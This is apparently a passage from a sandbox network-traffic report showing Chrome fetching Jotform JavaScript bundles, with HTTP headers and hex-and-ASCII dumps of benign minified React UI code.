                                                                                                                                                                                                                                            Data Ascii: on"}})},X=({planType:e,campaign:t,assetType:n})=>`?utm_source=limit-assets&utm_medium=banner&utm_content=${e}-${n}&utm_campaign=${t}`,Q=e=>((null==Z?void 0:Z[e])||"").toLowerCase(),ee=({user:e})=>{const{username:t="",account_type:{name:n=""},limitEstimati
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 7d 29 7d 29 2c 5b 5d 29 3b 63 6f 6e 73 74 20 63 3d 48 28 29 28 22 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 33 20 70 78 2d 35 20 70 79 2d 33 20 72 61 64 69 75 73 22 2c 7b 22 61 6c 6d 6f 73 74 46 75 6c 6c 2d 62 6f 78 22 3a 22 61 6c 6d 6f 73 74 46 75 6c 6c 22 3d 3d 3d 74 2c 22 6f 76 65 72 71 75 6f 74 61 2d 62 6f 78 22 3a 22 6f 76 65 72 71 75 6f 74 61 22 3d 3d 3d 74 7d 29 2c 64 3d 48 28 29 28 22 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 65 6e 74 65 72 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 72 61 64 69 75 73 20 74 65 78 74 2d 73 6d 20 7a 2d 31 20 66 6f 6e 74 2d 62 6f 6c 64 20 77 2d 33 36 20 6d 79 2d 30 20 6d 78 2d 61 75 74 6f 20 70 79 2d 32 22 2c 7b 22 61 6c 6d 6f 73 74 46 75 6c 6c 2d 75 70 67 72 61 64 65
                                                                                                                                                                                                                                            Data Ascii: })}),[]);const c=H()("flex flex-col items-center gap-3 px-5 py-3 radius",{"almostFull-box":"almostFull"===t,"overquota-box":"overquota"===t}),d=H()("flex justify-center items-center radius text-sm z-1 font-bold w-36 my-0 mx-auto py-2",{"almostFull-upgrade
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6e 2c 69 29 26 26 28 65 5b 69 5d 3d 6e 5b 69 5d 29 7d 72 65 74 75 72 6e 20 65 7d 2c 6c 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 63 6f 6e 73 74 20 63 65 3d 65 3d 3e 6f 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 76 67 22 2c 6c 65 28 7b 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 66 69 6c 6c 3a 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 34 20 32 34 22 7d 2c 65 29 2c 69 65 7c 7c 28 69 65 3d 6f 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 2c 64 3a 22 4d 38 20 33 61 31 20 31 20 30 20
                                                                                                                                                                                                                                            Data Ascii: hasOwnProperty.call(n,i)&&(e[i]=n[i])}return e},le.apply(null,arguments)}const ce=e=>o.createElement("svg",le({xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},e),ie||(ie=o.createElement("path",{fillRule:"evenodd",d:"M8 3a1 1 0
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 70 65 29 29 7d 2c 67 65 3d 65 3d 3e 7b 63 6f 6e 73 74 7b 73 74 61 74 75 73 3a 74 3d 21 31 2c 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3a 6e 3d 22 22 7d 3d 65 3b 72 65 74 75 72 6e 20 74 3f 6e 3a 6e 75 6c 6c 7d 2c 68 65 3d 28 65 2c 74 29 3d 3e 7b 6c 65 74 20 6e 3d 65 2f 74 2a 31 30 30 3b 72 65 74 75 72 6e 20 6e 3e 3d 31 30 30 3f 6e 3d 31 30 30 3a 6e 3e 30 26 26 6e 3c 3d 31 26 26 28 6e 3d 31 29 2c 6e 7d 2c 76 65 3d 65 3d 3e 7b 6c 65 74 20 74 3d 22 22 3b 72 65 74 75 72 6e 20 65 3c 34 30 26 26 28 74 3d 53 29 2c 65 3e 3d 34 30 26 26 65 3c 36 30 26 26 28 74 3d 62 29 2c 65 3e 3d 36 30 26 26 65 3c 38 30 26 26 28 74 3d 79 29 2c 65 3e 3d 38 30 26 26 28 74 3d 55 29 2c 74 7d 2c 5f 65 3d 65 3d 3e 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 65 3e 2d 31 2c 43
                                                                                                                                                                                                                                            Data Ascii: pe))},ge=e=>{const{status:t=!1,utm_campaign:n=""}=e;return t?n:null},he=(e,t)=>{let n=e/t*100;return n>=100?n=100:n>0&&n<=1&&(n=1),n},ve=e=>{let t="";return e<40&&(t=S),e>=40&&e<60&&(t=b),e>=60&&e<80&&(t=y),e>=80&&(t=U),t},_e=e=>"number"==typeof e&&e>-1,C
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 72 6e 20 6e 3d 65 2e 66 69 6c 74 65 72 28 28 65 3d 3e 65 2e 6e 61 6d 65 21 3d 3d 74 2e 6e 61 6d 65 29 29 2c 5b 5b 74 5d 2c 6e 5d 7d 29 28 28 28 65 3d 5b 5d 29 3d 3e 45 65 28 65 29 3f 65 2e 73 6f 72 74 28 28 28 65 2c 74 29 3d 3e 74 2e 70 65 72 63 65 6e 74 61 67 65 2d 65 2e 70 65 72 63 65 6e 74 61 67 65 29 29 3a 65 29 28 28 28 65 3d 5b 5d 29 3d 3e 7b 63 6f 6e 73 74 20 74 3d 65 2e 66 69 6e 64 49 6e 64 65 78 28 28 65 3d 3e 65 2e 6e 61 6d 65 3d 3d 3d 67 2e 57 4f 52 4b 46 4c 4f 57 5f 52 55 4e 53 29 29 3b 69 66 28 2d 31 3d 3d 3d 74 29 72 65 74 75 72 6e 20 65 3b 63 6f 6e 73 74 20 6e 3d 65 2e 66 69 6e 64 49 6e 64 65 78 28 28 65 3d 3e 65 2e 6e 61 6d 65 3d 3d 3d 67 2e 53 49 47 4e 45 44 5f 44 4f 43 55 4d 45 4e 54 53 29 29 2c 5b 69 5d 3d 65 2e 73 70 6c 69 63 65 28 74
                                                                                                                                                                                                                                            Data Ascii: rn n=e.filter((e=>e.name!==t.name)),[[t],n]})(((e=[])=>Ee(e)?e.sort(((e,t)=>t.percentage-e.percentage)):e)(((e=[])=>{const t=e.findIndex((e=>e.name===g.WORKFLOW_RUNS));if(-1===t)return e;const n=e.findIndex((e=>e.name===g.SIGNED_DOCUMENTS)),[i]=e.splice(t
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 30 20 30 20 31 20 30 20 31 33 2e 35 34 34 56 33 2e 33 33 34 41 33 2e 33 33 33 20 33 2e 33 33 33 20 30 20 30 20 31 20 33 2e 33 33 33 20 30 68 31 33 2e 33 33 34 41 33 2e 33 33 33 20 33 2e 33 33 33 20 30 20 30 20 31 20 32 30 20 33 2e 33 33 33 76 31 33 2e 33 33 34 41 33 2e 33 33 33 20 33 2e 33 33 33 20 30 20 30 20 31 20 31 36 2e 36 36 37 20 32 30 48 36 2e 34 35 36 61 32 2e 31 35 20 32 2e 31 35 20 30 20 30 20 31 2d 31 2e 39 39 37 2d 31 2e 33 35 32 6c 2d 2e 30 34 31 2d 2e 31 30 33 61 31 2e 38 35 20 31 2e 38 35 20 30 20 30 20 31 2d 2e 30 33 37 2d 31 2e 32 37 6c 2e 30 35 33 2d 2e 31 36 61 31 2e 36 38 36 20 31 2e 36 38 36 20 30 20 30 20 31 20 32 2e 32 32 37 2d 31 2e 30 33 34 6d 2d 33 2e 33 32 37 2d 34 2e 34 31 33 53 33 2e 37 35 20 31 30 20 35 20 39 2e 31 36 37 63
                                                                                                                                                                                                                                            Data Ascii: 0 0 1 0 13.544V3.334A3.333 3.333 0 0 1 3.333 0h13.334A3.333 3.333 0 0 1 20 3.333v13.334A3.333 3.333 0 0 1 16.667 20H6.456a2.15 2.15 0 0 1-1.997-1.352l-.041-.103a1.85 1.85 0 0 1-.037-1.27l.053-.16a1.686 1.686 0 0 1 2.227-1.034m-3.327-4.413S3.75 10 5 9.167c
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 73 29 28 73 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 73 2e 6a 73 78 73 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 68 65 61 64 65 72 2d 77 72 61 70 70 65 72 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 73 2e 6a 73 78 29 28 22 73 70 61 6e 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 69 63 6f 6e 2d 77 72 61 70 70 65 72 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 73 2e 6a 73 78 29 28 62 65 2e 5a 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 69 63 6f 6e 22 2c 73 74 79 6c 65 3a 7b 66 69 6c 6c 3a 22 23 35 39 36 45 44 37 22 7d 7d 29 7d 29 2c 28 30 2c 73 2e 6a 73 78 29 28 22 68 35 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 74 69 74 6c 65 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 6c 2e 74 29 28 6b 65 2e 50 2e 43 4f 4e 47 52 41 54
                                                                                                                                                                                                                                            Data Ascii: s)(s.Fragment,{children:[(0,s.jsxs)("div",{className:"header-wrapper",children:[(0,s.jsx)("span",{className:"icon-wrapper",children:(0,s.jsx)(be.Z,{className:"icon",style:{fill:"#596ED7"}})}),(0,s.jsx)("h5",{className:"title",children:(0,l.t)(ke.P.CONGRAT


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            62192.168.2.1749774104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC574OUTGET /s/portal/674ac14411e/static/js/PublicAppContainer.038a736a.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn03.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC429INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:16 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 152960
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:21:17 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:20:44 GMT
                                                                                                                                                                                                                                            etag: "6ec7d849da15c0bf56c2c65d24b78e48"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 278
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6328cce7ce7-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC940INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 65 2e 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 37 39 39 39 34 36 61 66 2d 35 64 38 66 2d 35 34 30 38 2d 38 32 61 32 2d 66 35 33 33 33 65
                                                                                                                                                                                                                                            Data Ascii: "use strict";!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="799946af-5d8f-5408-82a2-f5333e
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 63 6f 6e 74 65 6e 74 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 63 61 6c 63 28 24 7b 28 7b 69 73 4f 72 64 65 72 4e 6f 77 42 75 74 74 6f 6e 56 69 73 69 62 6c 65 3a 65 7d 29 3d 3e 65 3f 22 39 35 70 78 22 3a 22 30 70 78 22 7d 29 3b 0a 20 20 60 7d 3b 0a 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 0a 20 20 2e 6d 6f 62 69 6c 65 43 74 78 4d 65 6e 75 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 30 30 31 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 74 6f 70 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 68 65
                                                                                                                                                                                                                                            Data Ascii: content; margin: 0 auto; margin-bottom: calc(${({isOrderNowButtonVisible:e})=>e?"95px":"0px"}); `}; font-size: 1em; text-align: center; .mobileCtxMenu { position: fixed; z-index: 1001; left: 0; top: 0; width: 100%; he
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 20 61 6c 6c 20 34 30 30 6d 73 3b 0a 20 20 7d 0a 0a 20 20 2e 6f 72 64 65 72 4e 6f 77 2d 65 78 69 74 2d 61 63 74 69 76 65 20 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 2e 6f 72 64 65 72 42 74 6e 2d 65 6e 74 65 72 20 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 0a 20 20 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 61 6c 6c 20 34 30 30 6d 73 3b 0a 20 20 7d 0a 0a 20 20 2e 6f 72 64 65 72 42 74 6e 2d 65 6e 74 65 72 2d 61 63 74 69 76 65 20 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 0a 20 20 7d 0a 0a 20 20 2e 6f 72 64 65 72 42 74 6e 2d 65 78 69 74 20 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 0a 20 20 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 61 6c 6c 20 34 30 30 6d 73 3b 0a 20 20 7d 0a 0a 20 20 2e 6f 72 64 65 72
                                                                                                                                                                                                                                            Data Ascii: all 400ms; } .orderNow-exit-active { opacity: 0; } .orderBtn-enter { opacity: 0; transition: all 400ms; } .orderBtn-enter-active { opacity: 1; } .orderBtn-exit { opacity: 1; transition: all 400ms; } .order
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 20 20 7d 0a 20 20 7d 0a 60 2c 44 3d 79 2e 5a 50 2e 64 69 76 60 0a 20 20 2d 77 65 62 6b 69 74 2d 6f 76 65 72 66 6c 6f 77 2d 73 63 72 6f 6c 6c 69 6e 67 3a 20 74 6f 75 63 68 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 61 75 74 6f 3b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 0a 20 20 2e 61 63 63 42 6f 78 2d 62 61 63 6b 64 72 6f 70 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 61 75 74 6f 3b 0a 20 20 7d 0a 0a 20 20 69 66 72 61 6d 65 20 7b 0a 20 20 20
                                                                                                                                                                                                                                            Data Ascii: } }`,D=y.ZP.div` -webkit-overflow-scrolling: touch; overflow-y: auto; position: relative; height: 100%; .accBox-backdrop { position: absolute; width: 100%; height: 100%; opacity: 0; overflow-y: auto; } iframe {
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 76 61 72 20 52 3d 65 3d 3e 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 76 67 22 2c 53 28 7b 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 77 69 64 74 68 3a 32 30 2c 68 65 69 67 68 74 3a 32 34 2c 66 69 6c 6c 3a 22 6e 6f 6e 65 22 7d 2c 65 29 2c 4f 7c 7c 28 4f 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 23 32 37 38 44 46 46 22 2c 64 3a 22 4d 36 2e 35 31 33 20 36 2e 37 31 33 76 31 2e 34 33 33 48 32 2e 33 30 36 63 2d 2e 33 30 33 20 30 2d 2e 35 35 37 2e 31 39 32 2d 2e 36 31 2e 34 34 31 6c 2d 2e 30 31 2e 30 39 36 76 31 33 2e 33 37 34 63 30 20 2e 32 36 32 2e 32 32 31 2e 34 38 32 2e 35 30 39 2e 35 32 38 6c 2e 31 31 31 2e 30 31 68 31 35 2e 34 34 37
                                                                                                                                                                                                                                            Data Ascii: var R=e=>i.createElement("svg",S({xmlns:"http://www.w3.org/2000/svg",width:20,height:24,fill:"none"},e),O||(O=i.createElement("path",{fill:"#278DFF",d:"M6.513 6.713v1.433H2.306c-.303 0-.557.192-.61.441l-.01.096v13.374c0 .262.221.482.509.528l.111.01h15.447
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 28 52 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 6d 6c 2d 32 22 7d 29 7d 29 5d 7d 29 2c 28 30 2c 6e 2e 6a 73 78 73 29 28 22 6c 69 22 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 22 32 2e 20 22 2c 28 30 2c 62 2e 74 29 28 22 53 65 6c 65 63 74 20 27 41 64 64 20 74 6f 20 48 6f 6d 65 20 53 63 72 65 65 6e 27 22 29 5d 7d 29 5d 7d 29 7d 29 3a 28 30 2c 6e 2e 6a 73 78 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 74 77 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 6e 2e 6a 73 78 73 29 28 22 6f 6c 22 2c 7b 74 79 70 65 3a 22 31 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 6e 2e 6a 73 78 73 29 28 22 6c 69 22 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 22 31 2e 20 22 2c 28 30 2c 62 2e 63 7a 29 28 22 54 61 70 20 74 68 65 20 5b 31 5b 7b 6f 73 49 63 6f 6e 7d 5d 5d 20 6d 65 6e 75 20
                                                                                                                                                                                                                                            Data Ascii: (R,{className:"ml-2"})})]}),(0,n.jsxs)("li",{children:["2. ",(0,b.t)("Select 'Add to Home Screen'")]})]})}):(0,n.jsx)("div",{className:"tw",children:(0,n.jsxs)("ol",{type:"1",children:[(0,n.jsxs)("li",{children:["1. ",(0,b.cz)("Tap the [1[{osIcon}]] menu
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 63 6f 6e 74 65 6e 74 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 6e 2e 6a 73 78 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 69 63 6f 6e 2d 63 6f 6e 74 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 6e 2e 6a 73 78 29 28 4d 2e 5a 2c 7b 61 70 70 50 72 6f 70 65 72 74 69 65 73 3a 6f 2c 64 65 66 61 75 6c 74 4c 6f 67 6f 55 52 4c 3a 63 2c 77 69 74 68 42 6f 72 64 65 72 3a 6b 7d 29 7d 29 2c 28 30 2c 6e 2e 6a 73 78 29 28 22 68 31 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 74 69 74 6c 65 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 62 2e 74 29 28 22 41 64 64 20 7b 74 69 74 6c 65 7d 20 74 6f 20 59 6f 75 72 20 48 6f 6d 65 20 53 63 72 65 65 6e 3f 22 29 2e 72 65 70 6c 61 63 65 28 22 7b 74 69 74 6c 65 7d
                                                                                                                                                                                                                                            Data Ascii: )("div",{className:"content",children:[(0,n.jsx)("div",{className:"icon-cont",children:(0,n.jsx)(M.Z,{appProperties:o,defaultLogoURL:c,withBorder:k})}),(0,n.jsx)("h1",{className:"title",children:(0,b.t)("Add {title} to Your Home Screen?").replace("{title}
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 30 30 2f 73 76 67 22 2c 66 69 6c 6c 3a 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 34 20 32 34 22 7d 2c 65 29 2c 55 7c 7c 28 55 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 2c 64 3a 22 4d 36 20 31 68 31 32 61 33 20 33 20 30 20 30 20 31 20 33 20 33 76 37 2e 36 30 31 61 33 2e 37 35 37 20 33 2e 37 35 37 20 30 20 30 20 30 2d 33 2e 35 30 35 2e 32 39 35 20 31 2e 31 34 20 31 2e 31 34 20 30 20 30 20 30 2d 31 2e 31 33 35 2d 31 2e 30 33 36 48 37 2e 36 34 61 31 2e 31 34 20 31 2e 31 34 20 30 20 30 20 30 20 30 20 32 2e 32 38 68 38 2e 34 39 32 6c 2d 31 2e 35 38 20 31 2e 35 38 48 37 2e 36 34 61 31 2e 31 34 20 31 2e 31 34 20 30 20 30 20 30 20 30
                                                                                                                                                                                                                                            Data Ascii: 00/svg",fill:"currentColor",viewBox:"0 0 24 24"},e),U||(U=i.createElement("path",{fillRule:"evenodd",d:"M6 1h12a3 3 0 0 1 3 3v7.601a3.757 3.757 0 0 0-3.505.295 1.14 1.14 0 0 0-1.135-1.036H7.64a1.14 1.14 0 0 0 0 2.28h8.492l-1.58 1.58H7.64a1.14 1.14 0 0 0 0
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 0a 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 32 30 70 78 29 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 7d 0a 0a 20 20 2e 6d 6f 62 69 6c 65 43 74 78 4d 65 6e 75 2d 65 78 69 74 2d 61 63 74 69 76 65 20 26 20 7b 0a 20 20 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 2e 34 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 20 30 73 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 31 30 30 25 29 3b 0a 20 20 7d 0a 0a 20 20 2e 6d 6f 62 69 6c 65 43 74 78 4d 65 6e 75 48 65 61 64 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f
                                                                                                                                                                                                                                            Data Ascii: transform: translateY(20px); } } } .mobileCtxMenu-exit-active & { transition: .4s ease-in-out 0s; transform: translateY(100%); } .mobileCtxMenuHeader { position: relative; margin-bottom: 10px; padding-botto
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 6d 49 44 3a 28 30 2c 72 2e 6f 6e 65 4f 66 54 79 70 65 29 28 5b 72 2e 73 74 72 69 6e 67 2c 72 2e 6e 75 6d 62 65 72 5d 29 2e 69 73 52 65 71 75 69 72 65 64 2c 66 6f 72 6d 54 69 74 6c 65 3a 72 2e 73 74 72 69 6e 67 2c 69 74 65 6d 73 3a 28 30 2c 72 2e 61 72 72 61 79 4f 66 29 28 28 30 2c 72 2e 73 68 61 70 65 29 28 7b 7d 29 29 2c 6f 6e 4d 6f 64 61 6c 43 6c 6f 73 65 3a 72 2e 66 75 6e 63 2c 69 73 4f 70 65 6e 3a 72 2e 62 6f 6f 6c 7d 2c 61 65 2e 64 65 66 61 75 6c 74 50 72 6f 70 73 3d 7b 69 74 65 6d 73 3a 5b 5d 2c 66 6f 72 6d 54 69 74 6c 65 3a 22 22 2c 6f 6e 4d 6f 64 61 6c 43 6c 6f 73 65 3a 65 3d 3e 65 2c 69 73 4f 70 65 6e 3a 21 31 7d 3b 76 61 72 20 73 65 3d 61 65 2c 6c 65 3d 6f 28 22 35 31 35 37 31 22 29 2c 63 65 3d 6f 28 22 32 35 36 38 22 29 2c 70 65 3d 6f 28 22 36
                                                                                                                                                                                                                                            Data Ascii: mID:(0,r.oneOfType)([r.string,r.number]).isRequired,formTitle:r.string,items:(0,r.arrayOf)((0,r.shape)({})),onModalClose:r.func,isOpen:r.bool},ae.defaultProps={items:[],formTitle:"",onModalClose:e=>e,isOpen:!1};var se=ae,le=o("51571"),ce=o("2568"),pe=o("6


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            63192.168.2.1749776104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC386OUTGET /s/portal/674ac14411e/static/js/3186.c12c9a19.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn03.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC428INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:16 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 47148
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:21:17 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:20:44 GMT
                                                                                                                                                                                                                                            etag: "c45ac812e8a964e34c70f49737398bc7"
